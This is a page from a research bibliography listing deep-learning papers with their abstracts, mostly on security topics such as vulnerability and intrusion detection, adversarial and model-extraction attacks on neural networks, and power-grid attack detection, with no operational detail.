Visible to the public Biblio

Found 631 results

Filters: Keyword is Deep Learning  [Clear All Filters]
2023-02-13
Wu, Yueming, Zou, Deqing, Dou, Shihan, Yang, Wei, Xu, Duo, Jin, Hai.  2022.  VulCNN: An Image-inspired Scalable Vulnerability Detection System. 2022 IEEE/ACM 44th International Conference on Software Engineering (ICSE). :2365—2376.
Since deep learning (DL) can automatically learn features from source code, it has been widely used to detect source code vulnerability. To achieve scalable vulnerability scanning, some prior studies intend to process the source code directly by treating them as text. To achieve accurate vulnerability detection, other approaches consider distilling the program semantics into graph representations and using them to detect vulnerability. In practice, text-based techniques are scalable but not accurate due to the lack of program semantics. Graph-based methods are accurate but not scalable since graph analysis is typically time-consuming. In this paper, we aim to achieve both scalability and accuracy on scanning large-scale source code vulnerabilities. Inspired by existing DL-based image classification which has the ability to analyze millions of images accurately, we prefer to use these techniques to accomplish our purpose. Specifically, we propose a novel idea that can efficiently convert the source code of a function into an image while preserving the program details. We implement Vul-CNN and evaluate it on a dataset of 13,687 vulnerable functions and 26,970 non-vulnerable functions. Experimental results report that VulCNN can achieve better accuracy than eight state-of-the-art vul-nerability detectors (i.e., Checkmarx, FlawFinder, RATS, TokenCNN, VulDeePecker, SySeVR, VulDeeLocator, and Devign). As for scalability, VulCNN is about four times faster than VulDeePecker and SySeVR, about 15 times faster than VulDeeLocator, and about six times faster than Devign. Furthermore, we conduct a case study on more than 25 million lines of code and the result indicates that VulCNN can detect large-scale vulnerability. Through the scanning reports, we finally discover 73 vulnerabilities that are not reported in NVD.
2023-02-03
Kumar, Abhinav, Tourani, Reza, Vij, Mona, Srikanteswara, Srikathyayani.  2022.  SCLERA: A Framework for Privacy-Preserving MLaaS at the Pervasive Edge. 2022 IEEE International Conference on Pervasive Computing and Communications Workshops and other Affiliated Events (PerCom Workshops). :175–180.
The increasing data generation rate and the proliferation of deep learning applications have led to the development of machine learning-as-a-service (MLaaS) platforms by major Cloud providers. The existing MLaaS platforms, however, fall short in protecting the clients’ private data. Recent distributed MLaaS architectures such as federated learning have also shown to be vulnerable against a range of privacy attacks. Such vulnerabilities motivated the development of privacy-preserving MLaaS techniques, which often use complex cryptographic prim-itives. Such approaches, however, demand abundant computing resources, which undermine the low-latency nature of evolving applications such as autonomous driving.To address these challenges, we propose SCLERA–an efficient MLaaS framework that utilizes trusted execution environment for secure execution of clients’ workloads. SCLERA features a set of optimization techniques to reduce the computational complexity of the offloaded services and achieve low-latency inference. We assessed SCLERA’s efficacy using image/video analytic use cases such as scene detection. Our results show that SCLERA achieves up to 23× speed-up when compared to the baseline secure model execution.
Oldal, Laura Gulyás, Kertész, Gábor.  2022.  Evaluation of Deep Learning-based Authorship Attribution Methods on Hungarian Texts. 2022 IEEE 10th Jubilee International Conference on Computational Cybernetics and Cyber-Medical Systems (ICCC). :000161–000166.
The range of text analysis methods in the field of natural language processing (NLP) has become more and more extensive thanks to the increasing computational resources of the 21st century. As a result, many deep learning-based solutions have been proposed for the purpose of authorship attribution, as they offer more flexibility and automated feature extraction compared to traditional statistical methods. A number of solutions have appeared for the attribution of English texts, however, the number of methods designed for Hungarian language is extremely small. Hungarian is a morphologically rich language, sentence formation is flexible and the alphabet is different from other languages. Furthermore, a language specific POS tagger, pretrained word embeddings, dependency parser, etc. are required. As a result, methods designed for other languages cannot be directly applied on Hungarian texts. In this paper, we review deep learning-based authorship attribution methods for English texts and offer techniques for the adaptation of these solutions to Hungarian language. As a part of the paper, we collected a new dataset consisting of Hungarian literary works of 15 authors. In addition, we extensively evaluate the implemented methods on the new dataset.
Liu, Qin, Yang, Jiamin, Jiang, Hongbo, Wu, Jie, Peng, Tao, Wang, Tian, Wang, Guojun.  2022.  When Deep Learning Meets Steganography: Protecting Inference Privacy in the Dark. IEEE INFOCOM 2022 - IEEE Conference on Computer Communications. :590–599.
While cloud-based deep learning benefits for high-accuracy inference, it leads to potential privacy risks when exposing sensitive data to untrusted servers. In this paper, we work on exploring the feasibility of steganography in preserving inference privacy. Specifically, we devise GHOST and GHOST+, two private inference solutions employing steganography to make sensitive images invisible in the inference phase. Motivated by the fact that deep neural networks (DNNs) are inherently vulnerable to adversarial attacks, our main idea is turning this vulnerability into the weapon for data privacy, enabling the DNN to misclassify a stego image into the class of the sensitive image hidden in it. The main difference is that GHOST retrains the DNN into a poisoned network to learn the hidden features of sensitive images, but GHOST+ leverages a generative adversarial network (GAN) to produce adversarial perturbations without altering the DNN. For enhanced privacy and a better computation-communication trade-off, both solutions adopt the edge-cloud collaborative framework. Compared with the previous solutions, this is the first work that successfully integrates steganography and the nature of DNNs to achieve private inference while ensuring high accuracy. Extensive experiments validate that steganography has excellent ability in accuracy-aware privacy protection of deep learning.
ISSN: 2641-9874
Hussainy, Abdelrahman S., Khalifa, Mahmoud A., Elsayed, Abdallah, Hussien, Amr, Razek, Mohammed Abdel.  2022.  Deep Learning Toward Preventing Web Attacks. 2022 5th International Conference on Computing and Informatics (ICCI). :280–285.
Cyberattacks are one of the most pressing issues of our time. The impact of cyberthreats can damage various sectors such as business, health care, and governments, so one of the best solutions to deal with these cyberattacks and reduce cybersecurity threats is using Deep Learning. In this paper, we have created an in-depth study model to detect SQL Injection Attacks and Cross-Site Script attacks. We focused on XSS on the Stored-XSS attack type because SQL and Stored-XSS have similar site management methods. The advantage of combining deep learning with cybersecurity in our system is to detect and prevent short-term attacks without human interaction, so our system can reduce and prevent web attacks. This post-training model achieved a more accurate result more than 99% after maintaining the learning level, and 99% of our test data is determined by this model if this input is normal or dangerous.
Muliono, Yohan, Darus, Mohamad Yusof, Pardomuan, Chrisando Ryan, Ariffin, Muhammad Azizi Mohd, Kurniawan, Aditya.  2022.  Predicting Confidentiality, Integrity, and Availability from SQL Injection Payload. 2022 International Conference on Information Management and Technology (ICIMTech). :600–605.
SQL Injection has been around as a harmful and prolific threat on web applications for more than 20 years, yet it still poses a huge threat to the World Wide Web. Rapidly evolving web technology has not eradicated this threat; In 2017 51 % of web application attacks are SQL injection attacks. Most conventional practices to prevent SQL injection attacks revolves around secure web and database programming and administration techniques. Despite developer ignorance, a large number of online applications remain susceptible to SQL injection attacks. There is a need for a more effective method to detect and prevent SQL Injection attacks. In this research, we offer a unique machine learning-based strategy for identifying potential SQL injection attack (SQL injection attack) threats. Application of the proposed method in a Security Information and Event Management(SIEM) system will be discussed. SIEM can aggregate and normalize event information from multiple sources, and detect malicious events from analysis of these information. The result of this work shows that a machine learning based SQL injection attack detector which uses SIEM approach possess high accuracy in detecting malicious SQL queries.
2023-01-20
Mohammadpourfard, Mostafa, Weng, Yang, Genc, Istemihan, Kim, Taesic.  2022.  An Accurate False Data Injection Attack (FDIA) Detection in Renewable-Rich Power Grids. 2022 10th Workshop on Modelling and Simulation of Cyber-Physical Energy Systems (MSCPES). :1–5.
An accurate state estimation (SE) considering increased uncertainty by the high penetration of renewable energy systems (RESs) is more and more important to enhance situational awareness, and the optimal and resilient operation of the renewable-rich power grids. However, it is anticipated that adversaries who plan to manipulate the target power grid will generate attacks that inject inaccurate data to the SE using the vulnerabilities of the devices and networks. Among potential attack types, false data injection attack (FDIA) is gaining popularity since this can bypass bad data detection (BDD) methods implemented in the SE systems. Although numerous FDIA detection methods have been recently proposed, the uncertainty of system configuration that arises by the continuously increasing penetration of RESs has been been given less consideration in the FDIA algorithms. To address this issue, this paper proposes a new FDIA detection scheme that is applicable to renewable energy-rich power grids. A deep learning framework is developed in particular by synergistically constructing a Bidirectional Long Short-Term Memory (Bi-LSTM) with modern smart grid characteristics. The developed framework is evaluated on the IEEE 14-bus system integrating several RESs by using several attack scenarios. A comparison of the numerical results shows that the proposed FDIA detection mechanism outperforms the existing deep learning-based approaches in a renewable energy-rich grid environment.
Korkmaz, Yusuf, Huseinovic, Alvin, Bisgin, Halil, Mrdović, Saša, Uludag, Suleyman.  2022.  Using Deep Learning for Detecting Mirroring Attacks on Smart Grid PMU Networks. 2022 International Balkan Conference on Communications and Networking (BalkanCom). :84–89.
Similar to any spoof detection systems, power grid monitoring systems and devices are subject to various cyberattacks by determined and well-funded adversaries. Many well-publicized real-world cyberattacks on power grid systems have been publicly reported. Phasor Measurement Units (PMUs) networks with Phasor Data Concentrators (PDCs) are the main building blocks of the overall wide area monitoring and situational awareness systems in the power grid. The data between PMUs and PDC(s) are sent through the legacy networks, which are subject to many attack scenarios under with no, or inadequate, countermeasures in protocols, such as IEEE 37.118-2. In this paper, we consider a stealthier data spoofing attack against PMU networks, called a mirroring attack, where an adversary basically injects a copy of a set of packets in reverse order immediately following their original positions, wiping out the correct values. To the best of our knowledge, for the first time in the literature, we consider a more challenging attack both in terms of the strategy and the lower percentage of spoofed attacks. As part of our countermeasure detection scheme, we make use of novel framing approach to make application of a 2D Convolutional Neural Network (CNN)-based approach which avoids the computational overhead of the classical sample-based classification algorithms. Our experimental evaluation results show promising results in terms of both high accuracy and true positive rates even under the aforementioned stealthy adversarial attack scenarios.
2023-01-13
Kapoor, Mehul, Kaur, Puneet Jai.  2022.  Hybridization of Deep Learning & Machine Learning For IoT Based Intrusion Classification. 2022 International Conference on Breakthrough in Heuristics And Reciprocation of Advanced Technologies (BHARAT). :138—143.
With the rise of IoT applications, about 20.4 billion devices will be online in 2020, and that number will rise to 75 billion a month by 2025. Different sensors in IoT devices let them get and process data remotely and in real time. Sensors give them information that helps them make smart decisions and manage IoT environments well. IoT Security is one of the most important things to think about when you're developing, implementing, and deploying IoT platforms. People who use the Internet of Things (IoT) say that it allows people to communicate, monitor, and control automated devices from afar. This paper shows how to use Deep learning and machine learning to make an IDS that can be used on IoT platforms as a service. In the proposed method, a cnn mapped the features, and a random forest classifies normal and attack classes. In the end, the proposed method made a big difference in all performance parameters. Its average performance metrics have gone up 5% to 6%.
Krishna, P. Vamsi, Matta, Venkata Durga Rao.  2022.  A Unique Deep Intrusion Detection Approach (UDIDA) for Detecting the Complex Attacks. 2022 International Conference on Edge Computing and Applications (ICECAA). :557—560.
Intrusion Detection System (IDS) is one of the applications to detect intrusions in the network. IDS aims to detect any malicious activities that protect the computer networks from unknown persons or users called attackers. Network security is one of the significant tasks that should provide secure data transfer. Virtualization of networks becomes more complex for IoT technology. Deep Learning (DL) is most widely used by many networks to detect the complex patterns. This is very suitable approaches for detecting the malicious nodes or attacks. Software-Defined Network (SDN) is the default virtualization computer network. Attackers are developing new technology to attack the networks. Many authors are trying to develop new technologies to attack the networks. To overcome these attacks new protocols are required to prevent these attacks. In this paper, a unique deep intrusion detection approach (UDIDA) is developed to detect the attacks in SDN. Performance shows that the proposed approach is achieved more accuracy than existing approaches.
2023-01-06
Chen, Tianlong, Zhang, Zhenyu, Zhang, Yihua, Chang, Shiyu, Liu, Sijia, Wang, Zhangyang.  2022.  Quarantine: Sparsity Can Uncover the Trojan Attack Trigger for Free. 2022 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :588—599.
Trojan attacks threaten deep neural networks (DNNs) by poisoning them to behave normally on most samples, yet to produce manipulated results for inputs attached with a particular trigger. Several works attempt to detect whether a given DNN has been injected with a specific trigger during the training. In a parallel line of research, the lottery ticket hypothesis reveals the existence of sparse sub-networks which are capable of reaching competitive performance as the dense network after independent training. Connecting these two dots, we investigate the problem of Trojan DNN detection from the brand new lens of sparsity, even when no clean training data is available. Our crucial observation is that the Trojan features are significantly more stable to network pruning than benign features. Leveraging that, we propose a novel Trojan network detection regime: first locating a “winning Trojan lottery ticket” which preserves nearly full Trojan information yet only chance-level performance on clean inputs; then recovering the trigger embedded in this already isolated sub-network. Extensive experiments on various datasets, i.e., CIFAR-10, CIFAR-100, and ImageNet, with different network architectures, i.e., VGG-16, ResNet-18, ResNet-20s, and DenseNet-100 demonstrate the effectiveness of our proposal. Codes are available at https://github.com/VITA-Group/Backdoor-LTH.
Sharma, Himanshu, Kumar, Neeraj, Tekchandani, Raj Kumar, Mohammad, Nazeeruddin.  2022.  Deep Learning enabled Channel Secrecy Codes for Physical Layer Security of UAVs in 5G and beyond Networks. ICC 2022 - IEEE International Conference on Communications. :1—6.

Unmanned Aerial Vehicles (UAVs) are drawing enormous attention in both commercial and military applications to facilitate dynamic wireless communications and deliver seamless connectivity due to their flexible deployment, inherent line-of-sight (LOS) air-to-ground (A2G) channels, and high mobility. These advantages, however, render UAV-enabled wireless communication systems susceptible to eavesdropping attempts. Hence, there is a strong need to protect the wireless channel through which most of the UAV-enabled applications share data with each other. There exist various error correction techniques such as Low Density Parity Check (LDPC), polar codes that provide safe and reliable data transmission by exploiting the physical layer but require high transmission power. Also, the security gap achieved by these error-correction techniques must be reduced to improve the security level. In this paper, we present deep learning (DL) enabled punctured LDPC codes to provide secure and reliable transmission of data for UAVs through the Additive White Gaussian Noise (AWGN) channel irrespective of the computational power and channel state information (CSI) of the Eavesdropper. Numerical result analysis shows that the proposed scheme reduces the Bit Error Rate (BER) at Bob effectively as compared to Eve and the Signal to Noise Ratio (SNR) per bit value of 3.5 dB is achieved at the maximum threshold value of BER. Also, the security gap is reduced by 47.22 % as compared to conventional LDPC codes.

2023-01-05
C, Chethana, Pareek, Piyush Kumar, Costa de Albuquerque, Victor Hugo, Khanna, Ashish, Gupta, Deepak.  2022.  Deep Learning Technique Based Intrusion Detection in Cyber-Security Networks. 2022 IEEE 2nd Mysore Sub Section International Conference (MysuruCon). :1–7.
As a result of the inherent weaknesses of the wireless medium, ad hoc networks are susceptible to a broad variety of threats and assaults. As a direct consequence of this, intrusion detection, as well as security, privacy, and authentication in ad-hoc networks, have developed into a primary focus of current study. This body of research aims to identify the dangers posed by a variety of assaults that are often seen in wireless ad-hoc networks and provide strategies to counteract those dangers. The Black hole assault, Wormhole attack, Selective Forwarding attack, Sybil attack, and Denial-of-Service attack are the specific topics covered in this thesis. In this paper, we describe a trust-based safe routing protocol with the goal of mitigating the interference of black hole nodes in the course of routing in mobile ad-hoc networks. The overall performance of the network is negatively impacted when there are black hole nodes in the route that routing takes. As a result, we have developed a routing protocol that reduces the likelihood that packets would be lost as a result of black hole nodes. This routing system has been subjected to experimental testing in order to guarantee that the most secure path will be selected for the delivery of packets between a source and a destination. The invasion of wormholes into a wireless network results in the segmentation of the network as well as a disorder in the routing. As a result, we provide an effective approach for locating wormholes by using ordinal multi-dimensional scaling and round trip duration in wireless ad hoc networks with either sparse or dense topologies. Wormholes that are linked by both short route and long path wormhole linkages may be found using the approach that was given. In order to guarantee that this ad hoc network does not include any wormholes that go unnoticed, this method is subjected to experimental testing. In order to fight against selective forwarding attacks in wireless ad-hoc networks, we have developed three different techniques. The first method is an incentive-based algorithm that makes use of a reward-punishment system to drive cooperation among three nodes for the purpose of vi forwarding messages in crowded ad-hoc networks. A unique adversarial model has been developed by our team, and inside it, three distinct types of nodes and the activities they participate in are specified. We have shown that the suggested strategy that is based on incentives prohibits nodes from adopting an individualistic behaviour, which ensures collaboration in the process of packet forwarding. To guarantee that intermediate nodes in resource-constrained ad-hoc networks accurately convey packets, the second approach proposes a game theoretic model that uses non-cooperative game theory. This model is based on the idea that game theory may be used. This game reaches a condition of desired equilibrium, which assures that cooperation in multi-hop communication is physically possible, and it is this state that is discovered. In the third algorithm, we present a detection approach that locates malicious nodes in multihop hierarchical ad-hoc networks by employing binary search and control packets. We have shown that the cluster head is capable of accurately identifying the malicious node by analysing the sequences of packets that are dropped along the path leading from a source node to the cluster head. A lightweight symmetric encryption technique that uses Binary Playfair is presented here as a means of safeguarding the transport of data. We demonstrate via experimentation that the suggested encryption method is efficient with regard to the amount of energy used, the amount of time required for encryption, and the memory overhead. This lightweight encryption technique is used in clustered wireless ad-hoc networks to reduce the likelihood of a sybil attack occurring in such networks
2022-12-23
Huo, Da, Li, Xiaoyong, Li, Linghui, Gao, Yali, Li, Ximing, Yuan, Jie.  2022.  The Application of 1D-CNN in Microsoft Malware Detection. 2022 7th International Conference on Big Data Analytics (ICBDA). :181–187.
In the computer field, cybersecurity has always been the focus of attention. How to detect malware is one of the focuses and difficulties in network security research effectively. Traditional existing malware detection schemes can be mainly divided into two methods categories: database matching and the machine learning method. With the rise of deep learning, more and more deep learning methods are applied in the field of malware detection. Deeper semantic features can be extracted via deep neural network. The main tasks of this paper are as follows: (1) Using machine learning methods and one-dimensional convolutional neural networks to detect malware (2) Propose a machine The method of combining learning and deep learning is used for detection. Machine learning uses LGBM to obtain an accuracy rate of 67.16%, and one-dimensional CNN obtains an accuracy rate of 72.47%. In (2), LGBM is used to screen the importance of features and then use a one-dimensional convolutional neural network, which helps to further improve the detection result has an accuracy rate of 78.64%.
2022-12-20
Rakin, Adnan Siraj, Chowdhuryy, Md Hafizul Islam, Yao, Fan, Fan, Deliang.  2022.  DeepSteal: Advanced Model Extractions Leveraging Efficient Weight Stealing in Memories. 2022 IEEE Symposium on Security and Privacy (SP). :1157–1174.
Recent advancements in Deep Neural Networks (DNNs) have enabled widespread deployment in multiple security-sensitive domains. The need for resource-intensive training and the use of valuable domain-specific training data have made these models the top intellectual property (IP) for model owners. One of the major threats to DNN privacy is model extraction attacks where adversaries attempt to steal sensitive information in DNN models. In this work, we propose an advanced model extraction framework DeepSteal that steals DNN weights remotely for the first time with the aid of a memory side-channel attack. Our proposed DeepSteal comprises two key stages. Firstly, we develop a new weight bit information extraction method, called HammerLeak, through adopting the rowhammer-based fault technique as the information leakage vector. HammerLeak leverages several novel system-level techniques tailored for DNN applications to enable fast and efficient weight stealing. Secondly, we propose a novel substitute model training algorithm with Mean Clustering weight penalty, which leverages the partial leaked bit information effectively and generates a substitute prototype of the target victim model. We evaluate the proposed model extraction framework on three popular image datasets (e.g., CIFAR-10/100/GTSRB) and four DNN architectures (e.g., ResNet-18/34/Wide-ResNetNGG-11). The extracted substitute model has successfully achieved more than 90% test accuracy on deep residual networks for the CIFAR-10 dataset. Moreover, our extracted substitute model could also generate effective adversarial input samples to fool the victim model. Notably, it achieves similar performance (i.e., 1-2% test accuracy under attack) as white-box adversarial input attack (e.g., PGD/Trades).
ISSN: 2375-1207
Li, Fang-Qi, Wang, Shi-Lin, Zhu, Yun.  2022.  Fostering The Robustness Of White-Box Deep Neural Network Watermarks By Neuron Alignment. ICASSP 2022 - 2022 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). :3049–3053.
The wide application of deep learning techniques is boosting the regulation of deep learning models, especially deep neural networks (DNN), as commercial products. A necessary prerequisite for such regulations is identifying the owner of deep neural networks, which is usually done through the watermark. Current DNN watermarking schemes, particularly white-box ones, are uniformly fragile against a family of functionality equivalence attacks, especially the neuron permutation. This operation can effortlessly invalidate the ownership proof and escape copyright regulations. To enhance the robustness of white-box DNN watermarking schemes, this paper presents a procedure that aligns neurons into the same order as when the watermark is embedded, so the watermark can be correctly recognized. This neuron alignment process significantly facilitates the functionality of established deep neural network watermarking schemes.
Liu, Xiaolei, Li, Xiaoyu, Zheng, Desheng, Bai, Jiayu, Peng, Yu, Zhang, Shibin.  2022.  Automatic Selection Attacks Framework for Hard Label Black-Box Models. IEEE INFOCOM 2022 - IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). :1–7.

The current adversarial attacks against machine learning models can be divided into white-box attacks and black-box attacks. Further the black-box can be subdivided into soft label and hard label black-box, but the latter has the deficiency of only returning the class with the highest prediction probability, which leads to the difficulty in gradient estimation. However, due to its wide application, it is of great research significance and application value to explore hard label blackbox attacks. This paper proposes an Automatic Selection Attacks Framework (ASAF) for hard label black-box models, which can be explained in two aspects based on the existing attack methods. Firstly, ASAF applies model equivalence to select substitute models automatically so as to generate adversarial examples and then completes black-box attacks based on their transferability. Secondly, specified feature selection and parallel attack method are proposed to shorten the attack time and improve the attack success rate. The experimental results show that ASAF can achieve more than 90% success rate of nontargeted attack on the common models of traditional dataset ResNet-101 (CIFAR10) and InceptionV4 (ImageNet). Meanwhile, compared with FGSM and other attack algorithms, the attack time is reduced by at least 89.7% and 87.8% respectively in two traditional datasets. Besides, it can achieve 90% success rate of attack on the online model, BaiduAI digital recognition. In conclusion, ASAF is the first automatic selection attacks framework for hard label blackbox models, in which specified feature selection and parallel attack methods speed up automatic attacks.

Zhan, Yike, Zheng, Baolin, Wang, Qian, Mou, Ningping, Guo, Binqing, Li, Qi, Shen, Chao, Wang, Cong.  2022.  Towards Black-Box Adversarial Attacks on Interpretable Deep Learning Systems. 2022 IEEE International Conference on Multimedia and Expo (ICME). :1–6.
Recent works have empirically shown that neural network interpretability is susceptible to malicious manipulations. However, existing attacks against Interpretable Deep Learning Systems (IDLSes) all focus on the white-box setting, which is obviously unpractical in real-world scenarios. In this paper, we make the first attempt to attack IDLSes in the decision-based black-box setting. We propose a new framework called Dual Black-box Adversarial Attack (DBAA) which can generate adversarial examples that are misclassified as the target class, yet have very similar interpretations to their benign cases. We conduct comprehensive experiments on different combinations of classifiers and interpreters to illustrate the effectiveness of DBAA. Empirical results show that in all the cases, DBAA achieves high attack success rates and Intersection over Union (IoU) scores.
2022-12-09
Sagar, Maloth, C, Vanmathi.  2022.  Network Cluster Reliability with Enhanced Security and Privacy of IoT Data for Anomaly Detection Using a Deep Learning Model. 2022 Third International Conference on Intelligent Computing Instrumentation and Control Technologies (ICICICT). :1670—1677.

Cyber Physical Systems (CPS), which contain devices to aid with physical infrastructure activities, comprise sensors, actuators, control units, and physical objects. CPS sends messages to physical devices to carry out computational operations. CPS mainly deals with the interplay among cyber and physical environments. The real-time network data acquired and collected in physical space is stored there, and the connection becomes sophisticated. CPS incorporates cyber and physical technologies at all phases. Cyber Physical Systems are a crucial component of Internet of Things (IoT) technology. The CPS is a traditional concept that brings together the physical and digital worlds inhabit. Nevertheless, CPS has several difficulties that are likely to jeopardise our lives immediately, while the CPS's numerous levels are all tied to an immediate threat, therefore necessitating a look at CPS security. Due to the inclusion of IoT devices in a wide variety of applications, the security and privacy of users are key considerations. The rising level of cyber threats has left current security and privacy procedures insufficient. As a result, hackers can treat every person on the Internet as a product. Deep Learning (DL) methods are therefore utilised to provide accurate outputs from big complex databases where the outputs generated can be used to forecast and discover vulnerabilities in IoT systems that handles medical data. Cyber-physical systems need anomaly detection to be secure. However, the rising sophistication of CPSs and more complex attacks means that typical anomaly detection approaches are unsuitable for addressing these difficulties since they are simply overwhelmed by the volume of data and the necessity for domain-specific knowledge. The various attacks like DoS, DDoS need to be avoided that impact the network performance. In this paper, an effective Network Cluster Reliability Model with enhanced security and privacy levels for the data in IoT for Anomaly Detection (NSRM-AD) using deep learning model is proposed. The security levels of the proposed model are contrasted with the proposed model and the results represent that the proposed model performance is accurate

2022-12-01
Srikanth, K S, Ramesh, T K, Palaniswamy, Suja, Srinivasan, Ranganathan.  2022.  XAI based model evaluation by applying domain knowledge. 2022 IEEE International Conference on Electronics, Computing and Communication Technologies (CONECCT). :1—6.
Artificial intelligence(AI) is used in decision support systems which learn and perceive features as a function of the number of layers and the weights computed during training. Due to their inherent black box nature, it is insufficient to consider accuracy, precision and recall as metrices for evaluating a model's performance. Domain knowledge is also essential to identify features that are significant by the model to arrive at its decision. In this paper, we consider a use case of face mask recognition to explain the application and benefits of XAI. Eight models used to solve the face mask recognition problem were selected. GradCAM Explainable AI (XAI) is used to explain the state-of-art models. Models that were selecting incorrect features were eliminated even though, they had a high accuracy. Domain knowledge relevant to face mask recognition viz., facial feature importance is applied to identify the model that picked the most appropriate features to arrive at the decision. We demonstrate that models with high accuracies need not be necessarily select the right features. In applications requiring rapid deployment, this method can act as a deciding factor in shortlisting models with a guarantee that the models are looking at the right features for arriving at the classification. Furthermore, the outcomes of the model can be explained to the user enhancing their confidence on the AI model being deployed in the field.
Yu, Jialin, Cristea, Alexandra I., Harit, Anoushka, Sun, Zhongtian, Aduragba, Olanrewaju Tahir, Shi, Lei, Moubayed, Noura Al.  2022.  INTERACTION: A Generative XAI Framework for Natural Language Inference Explanations. 2022 International Joint Conference on Neural Networks (IJCNN). :1—8.
XAI with natural language processing aims to produce human-readable explanations as evidence for AI decision-making, which addresses explainability and transparency. However, from an HCI perspective, the current approaches only focus on delivering a single explanation, which fails to account for the diversity of human thoughts and experiences in language. This paper thus addresses this gap, by proposing a generative XAI framework, INTERACTION (explain aNd predicT thEn queRy with contextuAl CondiTional varIational autO-eNcoder). Our novel framework presents explanation in two steps: (step one) Explanation and Label Prediction; and (step two) Diverse Evidence Generation. We conduct intensive experiments with the Transformer architecture on a benchmark dataset, e-SNLI [1]. Our method achieves competitive or better performance against state-of-the-art baseline models on explanation generation (up to 4.7% gain in BLEU) and prediction (up to 4.4% gain in accuracy) in step one; it can also generate multiple diverse explanations in step two.
2022-11-08
Mode, Gautam Raj, Calyam, Prasad, Hoque, Khaza Anuarul.  2020.  Impact of False Data Injection Attacks on Deep Learning Enabled Predictive Analytics. NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium. :1–7.
Industry 4.0 is the latest industrial revolution primarily merging automation with advanced manufacturing to reduce direct human effort and resources. Predictive maintenance (PdM) is an industry 4.0 solution, which facilitates predicting faults in a component or a system powered by state-of-the- art machine learning (ML) algorithms (especially deep learning algorithms) and the Internet-of-Things (IoT) sensors. However, IoT sensors and deep learning (DL) algorithms, both are known for their vulnerabilities to cyber-attacks. In the context of PdM systems, such attacks can have catastrophic consequences as they are hard to detect due to the nature of the attack. To date, the majority of the published literature focuses on the accuracy of DL enabled PdM systems and often ignores the effect of such attacks. In this paper, we demonstrate the effect of IoT sensor attacks (in the form of false data injection attack) on a PdM system. At first, we use three state-of-the-art DL algorithms, specifically, Long Short-Term Memory (LSTM), Gated Recurrent Unit (GRU), and Convolutional Neural Network (CNN) for predicting the Remaining Useful Life (RUL) of a turbofan engine using NASA's C-MAPSS dataset. The obtained results show that the GRU-based PdM model outperforms some of the recent literature on RUL prediction using the C-MAPSS dataset. Afterward, we model and apply two different types of false data injection attacks (FDIA), specifically, continuous and interim FDIAs on turbofan engine sensor data and evaluate their impact on CNN, LSTM, and GRU-based PdM systems. The obtained results demonstrate that FDI attacks on even a few IoT sensors can strongly defect the RUL prediction in all cases. However, the GRU-based PdM model performs better in terms of accuracy and resiliency to FDIA. Lastly, we perform a study on the GRU-based PdM model using four different GRU networks with different sequence lengths. Our experiments reveal an interesting relationship between the accuracy, resiliency and sequence length for the GRU-based PdM models.
Javaheripi, Mojan, Samragh, Mohammad, Fields, Gregory, Javidi, Tara, Koushanfar, Farinaz.  2020.  CleaNN: Accelerated Trojan Shield for Embedded Neural Networks. 2020 IEEE/ACM International Conference On Computer Aided Design (ICCAD). :1–9.
We propose Cleann, the first end-to-end framework that enables online mitigation of Trojans for embedded Deep Neural Network (DNN) applications. A Trojan attack works by injecting a backdoor in the DNN while training; during inference, the Trojan can be activated by the specific backdoor trigger. What differentiates Cleann from the prior work is its lightweight methodology which recovers the ground-truth class of Trojan samples without the need for labeled data, model retraining, or prior assumptions on the trigger or the attack. We leverage dictionary learning and sparse approximation to characterize the statistical behavior of benign data and identify Trojan triggers. Cleann is devised based on algorithm/hardware co-design and is equipped with specialized hardware to enable efficient real-time execution on resource-constrained embedded platforms. Proof of concept evaluations on Cleann for the state-of-the-art Neural Trojan attacks on visual benchmarks demonstrate its competitive advantage in terms of attack resiliency and execution overhead.
Wshah, Safwan, Shadid, Reem, Wu, Yuhao, Matar, Mustafa, Xu, Beilei, Wu, Wencheng, Lin, Lei, Elmoudi, Ramadan.  2020.  Deep Learning for Model Parameter Calibration in Power Systems. 2020 IEEE International Conference on Power Systems Technology (POWERCON). :1–6.
In power systems, having accurate device models is crucial for grid reliability, availability, and resiliency. Existing model calibration methods based on mathematical approaches often lead to multiple solutions due to the ill-posed nature of the problem, which would require further interventions from the field engineers in order to select the optimal solution. In this paper, we present a novel deep-learning-based approach for model parameter calibration in power systems. Our study focused on the generator model as an example. We studied several deep-learning-based approaches including 1-D Convolutional Neural Network (CNN), Long Short-Term Memory (LSTM), and Gated Recurrent Units (GRU), which were trained to estimate model parameters using simulated Phasor Measurement Unit (PMU) data. Quantitative evaluations showed that our proposed methods can achieve high accuracy in estimating the model parameters, i.e., achieved a 0.0079 MSE on the testing dataset. We consider these promising results to be the basis for further exploration and development of advanced tools for model validation and calibration.
Shomron, Gil, Weiser, Uri.  2020.  Non-Blocking Simultaneous Multithreading: Embracing the Resiliency of Deep Neural Networks. 2020 53rd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). :256–269.
Deep neural networks (DNNs) are known for their inability to utilize underlying hardware resources due to hard-ware susceptibility to sparse activations and weights. Even in finer granularities, many of the non-zero values hold a portion of zero-valued bits that may cause inefficiencies when executed on hard-ware. Inspired by conventional CPU simultaneous multithreading (SMT) that increases computer resource utilization by sharing them across several threads, we propose non-blocking SMT (NB-SMT) designated for DNN accelerators. Like conventional SMT, NB-SMT shares hardware resources among several execution flows. Yet, unlike SMT, NB-SMT is non-blocking, as it handles structural hazards by exploiting the algorithmic resiliency of DNNs. Instead of opportunistically dispatching instructions while they wait in a reservation station for available hardware, NB-SMT temporarily reduces the computation precision to accommodate all threads at once, enabling a non-blocking operation. We demonstrate NB-SMT applicability using SySMT, an NB-SMT-enabled output-stationary systolic array (OS-SA). Compared with a conventional OS-SA, a 2-threaded SySMT consumes 1.4× the area and delivers 2× speedup with 33% energy savings and less than 1% accuracy degradation of state-of-the-art CNNs with ImageNet. A 4-threaded SySMT consumes 2.5× the area and delivers, for example, 3.4× speedup and 39%×energy savings with 1% accuracy degradation of 40%-pruned ResNet-18.